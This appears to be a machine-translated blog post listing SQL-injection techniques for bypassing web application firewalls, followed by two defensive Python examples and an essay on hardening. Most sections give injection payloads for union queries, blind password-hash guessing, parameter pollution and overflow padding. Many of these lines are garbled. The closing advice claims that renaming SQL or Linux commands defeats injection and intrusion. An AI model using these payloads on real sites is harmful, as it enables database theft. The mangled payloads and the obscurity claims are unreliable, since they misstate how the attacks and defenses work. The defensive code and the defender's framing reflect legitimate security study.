Once the system-level security defenses are in place, what remains is the web application layer: SQL injection, cross-site attacks and the like. This is also what troubles most webmasters. The article "Security treasure Architecture Technical speculation and advanced network security defense" explains one of the simplest high-performance defense methods; with slight modifications for your own situation it handles most attacks. But does that settle everything?
First, let's review how people online have broken through WAF defenses:
1. Mixed-case bypass
Everyone is familiar with this one. It works well against some low-quality WAFs. For example, if union is intercepted, Union or UnIoN is used to bypass it.
2. Simple encoding bypass
If the WAF detects a keyword, we can write the keyword so that it is not detected. For example, if union is detected, we use %55, the hexadecimal (URL) encoding of U, in place of U, so union is written as %55nION. Combined with case variation this bypasses some WAFs, and any one or more of the letters can be replaced in this way.
In addition, in MySQL injection, for example when a table name or load_file() is used, the table name or file name can be written in hexadecimal encoding to bypass the WAF.
3. Comment bypass
This case is rare. It applies when the WAF only filters out a dangerous statement and does not block the entire query.
01 ./? Id = 1 + union + select + 1, 2, 3 unionselect + 1, 2, 3, 3, 4...
As you can see, we only need to put the sensitive word inside a comment; note that a ! has to be added at the front of the comment.
4. Split and rewrite bypass
Continuing the example above: this applies when the WAF uses regular expressions and detects every sensitive word regardless of where it is written, filtering out as many as it finds.
We can split the sensitive words with comments so that the WAF's regular expression no longer matches, while the query result is unaffected.
01 ./? Id = 1 + union + select + 1, 2, 3 --
Rewrite bypass applies where the WAF filters only once. On the same principle as uploading an aaspsp web shell, we can write something like ununionion: after one union is filtered out, what remains is again union, and the query is executed.
01 .? Id = 1 ununionion select 1, 2, 3 --
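From the defender's side, items 1 and 4 show why removing keywords from input is not a fix while the input is still concatenated into the statement. The following is an added example, not code from the original article: it runs a case-sensitive, single-pass filter next to a bound-parameter query on an in-memory SQLite database. The table names, sample rows and function names are constructed for the illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE news(id INTEGER, title TEXT);"
        "CREATE TABLE users(login TEXT, pwd TEXT);"
        "INSERT INTO news VALUES (1, 'hello');"
        "INSERT INTO users VALUES ('admin', 's3cret');"
    )
    return db

def strip_keywords_once(value):
    # Hypothetical weak filter: case-sensitive, one pass over the input.
    for word in ("union", "select"):
        value = value.replace(word, "")
    return value

def lookup_filtered(db, raw_id):
    # Vulnerable: the filtered text is still concatenated into the statement.
    sql = "SELECT id, title FROM news WHERE id = " + strip_keywords_once(raw_id)
    return db.execute(sql).fetchall()

def lookup_bound(db, raw_id):
    # Hardened: validate the type, then bind; the value is never parsed as SQL.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a decimal integer")
    return db.execute(
        "SELECT id, title FROM news WHERE id = ?", (int(raw_id),)
    ).fetchall()

def leaks_users(rows):
    # True when a row of the users table shows up in a news lookup.
    return ("admin", "s3cret") in rows

if __name__ == "__main__":
    db = make_db()
    for raw in ("1", "1 UnIoN SeLeCT login, pwd FROM users",
                "1 ununionion seselectlect login, pwd FROM users"):
        print(repr(raw), "filtered leaks:", leaks_users(lookup_filtered(db, raw)))
        try:
            print("  bound:", lookup_bound(db, raw))
        except ValueError as exc:
            print("  bound rejected:", exc)
```

The bound version does not depend on recognising any keyword, so none of the rewriting tricks in this list changes its result.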
5. HTTP parameter pollution (HPP)
For example, we have the following statement:
01 ./? Id = 1 union select + 1, 2, 3 + from + users + where + id = 1 --
We can repeat the id parameter and put part of our value in the repeat to get past the filter; &id= becomes a comma when the query is built:
01 ./? Id = 1 union select + 1 & id = 2, 3 + from + users + where + id = 1 --
There are many conditions for success in this case, depending on the specific WAF implementation.
An example is provided to illustrate the usage:
01 ./? Id = 1 unionselectpwdfromusers--
The specifics depend on how the back-end code builds the query statement.
For example, the server code is written like this:
"select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit ".$_GET['c'];
Then we can construct the following injection statement:
01 ./? A = 1 + unionselect + 1, passfrom + users --
The final parsed result is as follows:
01. select * from table where a = 1 unionselect 1, passfrom users --
As you can see, this method is better suited to white-box testing and is troublesome to use in black-box penetration testing. But you can try it.
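The defensive consequence of item 5 is that a filter has to look at the value the application will actually receive. The following is an added example, not code from the original article: it takes the repeated-id query string from item 5, compares a per-value check with a check on the comma-joined value, and flags the duplicate parameter. The signature rule and function names are hypothetical, and the comma-joining back end is the behaviour the article assumes.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Hypothetical signature rule: "select ... from" inside one string.
RULE = re.compile(r"\bselect\b.+\bfrom\b", re.IGNORECASE)

# Query string from item 5 of the article, with the id parameter repeated.
SAMPLE = "id=1+union+select+1&id=2,3+from+users+where+id=1--"

def per_value_hits(query):
    # A filter that inspects each parameter value on its own.
    pairs = parse_qsl(query, keep_blank_values=True)
    return [value for _, value in pairs if RULE.search(value)]

def backend_view(query):
    # Assumed back-end behaviour, as the article states: repeated
    # parameters are joined with a comma before the application sees them.
    merged = defaultdict(list)
    for name, value in parse_qsl(query, keep_blank_values=True):
        merged[name].append(value)
    return {name: ",".join(values) for name, values in merged.items()}

def check_query(query, single_valued=("id",)):
    # Defender's check: flag repeats of parameters that must occur once,
    # and match the rule against the joined value the application will use.
    counts = defaultdict(int)
    for name, _ in parse_qsl(query, keep_blank_values=True):
        counts[name] += 1
    findings = [f"duplicate:{n}" for n in single_valued if counts[n] > 1]
    findings += [f"rule:{n}" for n, v in backend_view(query).items()
                 if RULE.search(v)]
    return findings

if __name__ == "__main__":
    print("per-value hits:", per_value_hits(SAMPLE))
    print("back-end view :", backend_view(SAMPLE))
    print("findings      :", check_query(SAMPLE))
```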
6. Use the logical operator or/and to bypass
01 ./? Id = 1 + OR + 0x50 = 0x50
02 ./? Id = 1 + and + ascii (lower (mid (select + pwd + from + users + limit +),) = 74
By the way, let's explain the second statement, working outward from the innermost brackets: select + pwd + from + users + limit + queries the first record of the pwd field in the users table, for example admin;
mid() of that result is the first character of admin, that is, a;
lower() of that converts the character to lowercase;
ascii() then converts a to its ASCII code, and the result is tested for whether it equals 74.
7. Comparison operator replacement
These include != (not equal), <> (not equal), < (less than) and > (greater than), any of which can be used in place of = to bypass the filter.
Take the previous example, which tests for 74: if = is filtered, we can test whether the value is greater than 73 and whether it is less than 75, and then we know that it is 74. Many WAFs forget this.
8. Replacement with equivalent functions
substring() can be replaced by mid() and substr(), all of which take a given character out of a string.
ascii() can be replaced by hex() or bin(), that is, hexadecimal and binary encoding. benchmark() can be replaced by sleep(); the two are used in time-based blind injection, which will be introduced later.
If these are blocked, there is a new method:
substring((select 'Password'),1,1) = 0x70
substr((select 'Password'),1,1) = 0x70
mid((select 'Password'),1,1) = 0x70
For example, to determine the value of the first character of the password, the following can be used:
strcmp(left('Password',1), 0x69) = 1
strcmp(left('Password',1), 0x70) = 0
strcmp(left('Password',1), 0x71) = -1
left() takes the given number of characters from the left of the string, and strcmp() compares two values: the result is 0 if they are equal, -1 if the left one is smaller, and 1 otherwise.
group_concat, concat and concat_ws, mentioned in the previous articles, can also be substituted for one another.
9. Blind injection without and/or
For example, there is an injection point:
01. index. php? Uid = 1, 123
Suppose and and or are filtered out. There is in fact a more direct method: we can replace 123 with a value generated by our own statement:
01. index. php? Uid = strcmp (left (select + hash + from + users + limit + 123), 1), 0x42) +
With 123 the page displays correctly. Now we blindly guess the first character of the hash: if it is 0x42, that is, B, then the strcmp result is 0 and 0 + 123 = 123, so the page should display correctly. Otherwise the character is not B. In this way the guessing works without using and or or.
10. Brackets
01 ./? Id = 1 + union + (select + 1, 2 + from + users)
Suppose the line above is intercepted by the WAF. Try adding some parentheses:
01 ./? Id = 1 + union + (select + 1, 2 + from + xxx)
02 ./? Id = (1) union (select (1), mid (hash, 1, 32) from (users ))
03 ./? Id = 1 + union + (select '1', concat (login, hash) from + users)
04 ./? Id = (1) union (select (1), hex (hash) from (users ))))))))
05 ./? Id = (1) or (0x50 = 0x50)
11. Buffer overflow bypass
This is from a foreign blog:
01. id = 1 and (select 1) = (Select 0 xaaaaaaaaaaaaaaaaaaa) + UnIoN + SeLeCT +, version (), database (), user (),
8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26
02., 27,28, 29,30, 31,32, 33,34, 35,36-+
In 0xaaaaaaaaaaaaaaaaaaaaaaa, the more A's the better; generally more than 1000.
The above are the bypass methods widely circulated on the Internet. I don't have time to try them, and I don't want to try them. Here is a question: with thousands of vulnerabilities, attack methods and defenses, is there a fundamental solution to all known and unknown vulnerability attacks?
In the final analysis, the Linux, Windows and MySQL we use were developed by others; they are not our own. The advantage of open source is that you can use it, but you cannot keep it confidential! To solve the problem, we have to start with software and system development. Even simple secondary development can defend against many attacks:
1. If you can do secondary development on MySQL, simply rename commands such as select and union to names that nobody else knows. Would you still worry about SQL injection?
2. If I do secondary development on MySQL and change the SQL standard and logic, would you still be afraid of or/and injection?
3. If I define my own development language, I don't need C or PHP. Are you afraid of any benefits?
4. If Linux is customized so that all the commands and system calls go through secondary development, would you still fear hacker intrusion? People would not even know how to run the ls command!
Although this violates the open-source spirit, much closed-source software and many firewalls have been doing it for a long time. To put it bluntly, what is secret is safest and what you create yourself is most reliable; after all, you can customize and extend it at will! Of course, without that technical capability, we can still do the following to frustrate hackers to the end:
1. Abandon MySQL, MongoDB and other databases with SQL injection risks. Use Redis or another simple NoSQL database that meets your current business needs; for logic and trigger functions, use Lua or PHP, and clear out all unneeded functions. Just as with Linux permissions, make everything fine-grained and remove whatever is not used!
2. For the software currently in use on Linux, such as nginx and Apache, make simple modifications to the source code. Even if the core algorithms cannot be changed, can't the command names and the user interface be changed? For example, remove the name of MySQL's select command and the names of the various corresponding encoding calls. Where would SQL injection be possible then?
Well, I hope this serves as a reference. Do not change the system into something that even you cannot use. Support open source, but do not stay at the level of merely using it: we still need to work hard to become open-source software developers, and you can also contribute your own innovative suggestions. Do not blindly follow the trend in anything. Use what works, and stop when it is enough; that is a simple and profound philosophy!